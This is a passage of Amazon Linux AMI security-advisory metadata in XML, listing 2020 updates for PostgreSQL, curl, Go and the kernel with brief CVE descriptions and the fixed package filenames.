name="php73-opcache" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.23-1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1441</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1441: medium priority package update for postgresql94</title><issued date="2020-10-26 18:25:00" /><updated date="2020-10-27 21:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-10208:
A flaw was discovered in postgresql where arbitrary SQL statements can be executed given a suitable SECURITY DEFINER function. An attacker, with EXECUTE permission on the function, can execute arbitrary SQL as the owner of the function.
1734416: CVE-2019-10208 postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10208" title="" id="CVE-2019-10208" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql94-devel" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.26-1.77.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1442</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1442: medium priority package update for postgresql95</title><issued date="2020-10-26 18:27:00" /><updated date="2020-10-27 21:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14350:
It was found that some PostgreSQL extensions did not use search_path safely in their installation script. An attacker with sufficient privileges could use this flaw to trick an administrator into executing a specially crafted script, during the installation or update of such extension. This affects PostgreSQL versions before 12.4, before 11.9, before 10.14, before 9.6.19, and before 9.5.23.
1865746: CVE-2020-14350 postgresql: Uncontrolled search path element in CREATE EXTENSION
CVE-2019-10208:
A flaw was discovered in postgresql where arbitrary SQL statements can be executed given a suitable SECURITY DEFINER function. An attacker, with EXECUTE permission on the function, can execute arbitrary SQL as the owner of the function.
1734416: CVE-2019-10208 postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution
CVE-2019-10130:
PostgreSQL maintains column statistics for tables. Certain statistics, such as histograms and lists of most common values, contain values taken from the column. PostgreSQL does not evaluate row security policies before consulting those statistics during query planning; an attacker can exploit this to read the most common values of certain columns. Affected columns are those for which the attacker has SELECT privilege and for which, in an ordinary query, row-level security prunes the set of rows visible to the attacker.
1707109: CVE-2019-10130 postgresql: Selectivity estimators bypass row security policies
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10130" title="" id="CVE-2019-10130" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10208" title="" id="CVE-2019-10208" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14350" title="" id="CVE-2020-14350" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql95-docs" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-static" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-server" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-contrib" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-devel-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-plperl" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.23-1.81.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1443</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1443: medium priority package update for postgresql96</title><issued date="2020-10-26 18:29:00" /><updated date="2020-10-27 21:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1720:
A flaw was found in PostgreSQL's "ALTER ... DEPENDS ON EXTENSION", where sub-commands did not perform authorization checks. An authenticated attacker could use this flaw in certain configurations to perform drop objects such as function, triggers, et al., leading to database corruption.
1798852: CVE-2020-1720 postgresql: ALTER ... DEPENDS ON EXTENSION is missing authorization checks
CVE-2020-14350:
It was found that some PostgreSQL extensions did not use search_path safely in their installation script. An attacker with sufficient privileges could use this flaw to trick an administrator into executing a specially crafted script, during the installation or update of such extension. This affects PostgreSQL versions before 12.4, before 11.9, before 10.14, before 9.6.19, and before 9.5.23.
1865746: CVE-2020-14350 postgresql: Uncontrolled search path element in CREATE EXTENSION
CVE-2019-10208:
A flaw was discovered in postgresql where arbitrary SQL statements can be executed given a suitable SECURITY DEFINER function. An attacker, with EXECUTE permission on the function, can execute arbitrary SQL as the owner of the function.
1734416: CVE-2019-10208 postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution
CVE-2019-10130:
PostgreSQL maintains column statistics for tables. Certain statistics, such as histograms and lists of most common values, contain values taken from the column. PostgreSQL does not evaluate row security policies before consulting those statistics during query planning; an attacker can exploit this to read the most common values of certain columns. Affected columns are those for which the attacker has SELECT privilege and for which, in an ordinary query, row-level security prunes the set of rows visible to the attacker.
1707109: CVE-2019-10130 postgresql: Selectivity estimators bypass row security policies
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10130" title="" id="CVE-2019-10130" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10208" title="" id="CVE-2019-10208" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14350" title="" id="CVE-2020-14350" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1720" title="" id="CVE-2020-1720" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql96" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-libs" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-static" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-static-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-contrib" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-devel" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-plperl" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.19-1.83.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1444</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1444: low priority package update for curl</title><issued date="2020-11-14 01:22:00" /><updated date="2020-11-16 21:17:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8231:
A flaw was found in libcurl from versions 7.29.0 through 7.71.1. An application that performs multiple requests with libcurl's multi API, and sets the `CURLOPT_CONNECT_ONLY` option, might experience libcurl using the wrong connection. The highest threat from this vulnerability is to data confidentiality.
1868032: CVE-2020-8231 curl: Expired pointer dereference via multi API with `CURLOPT_CONNECT_ONLY` option set
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8231" title="" id="CVE-2020-8231" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl-devel" version="7.61.1" release="12.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.95.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.95.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.95.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.95.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.95.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.95.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.95.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.95.amzn1.i686.rpm</filename></package><package name="curl" version="7.61.1" release="12.95.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.95.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.95.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.95.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1445</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1445: medium priority package update for golang</title><issued date="2020-11-14 01:22:00" /><updated date="2020-11-16 21:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-24553:
Go before 1.14.8 and 1.15.x before 1.15.1 allows XSS because text/html is the default for CGI/FCGI handlers that lack a Content-Type header.
1874857: CVE-2020-24553 golang: default Content-Type setting in net/http/cgi and net/http/fcgi could cause XSS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24553" title="" id="CVE-2020-24553" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-docs" version="1.15.3" release="1.63.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.15.3-1.63.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.15.3" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.15.3-1.63.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.15.3" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.15.3-1.63.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.15.3" release="1.63.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.15.3-1.63.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.15.3" release="1.63.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.15.3-1.63.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.15.3" release="1.63.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.15.3-1.63.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.15.3" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.15.3-1.63.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.15.3" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.15.3-1.63.amzn1.i686.rpm</filename></package><package name="golang" version="1.15.3" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.15.3-1.63.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1446</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1446: important priority package update for kernel</title><issued date="2020-11-14 01:22:00" /><updated date="2022-10-27 10:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-25211:
A flaw was found in the Linux kernel. A local attacker, able to inject conntrack netlink configuration, could overflow a local buffer causing crashes or triggering the use of incorrect protocol numbers in ctnetlink_parse_tuple_filter in net/netfilter/nf_conntrack_netlink.c. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2020-24490:
A heap buffer overflow flaw was found in the way the Linux kernel's Bluetooth implementation processed extended advertising report events. This flaw allows a remote attacker in an adjacent range to crash the system, causing a denial of service or to potentially execute arbitrary code on the system by sending a specially crafted Bluetooth packet. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
CVE-2020-14386:
A flaw was found in the Linux kernel. Memory corruption can be exploited to gain root privileges from unprivileged processes. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2020-12352:
An information leak flaw was found in the way Linux kernel's Bluetooth stack implementation handled initialization of stack memory when handling certain AMP (Alternate MAC-PHY Manager Protocol) packets. This flaw allows a remote attacker in an adjacent range to leak small portions of stack memory on the system by sending specially crafted AMP packets. The highest threat from this vulnerability is to data confidentiality.
CVE-2020-12351:
A flaw was found in the way the Linux kernel's Bluetooth implementation handled L2CAP (Logical Link Control and Adaptation Protocol) packets with A2MP (Alternate MAC-PHY Manager Protocol) CID (Channel Identifier). This flaw allows a remote attacker in an adjacent range to crash the system, causing a denial of service or potentially executing arbitrary code on the system by sending a specially crafted L2CAP packet. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2020-0423:
A use-after-free flaw was found in the binder_release_work of binder.c due to improper locking. This flaw can lead to the local escalation of privileges in the kernel where no additional execution privileges are needed. User interaction is not needed for exploitation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0423" title="" id="CVE-2020-0423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12351" title="" id="CVE-2020-12351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12352" title="" id="CVE-2020-12352" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14386" title="" id="CVE-2020-14386" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24490" title="" id="CVE-2020-24490" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25211" title="" id="CVE-2020-25211" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.203" release="116.332.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.203-116.332.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.203" 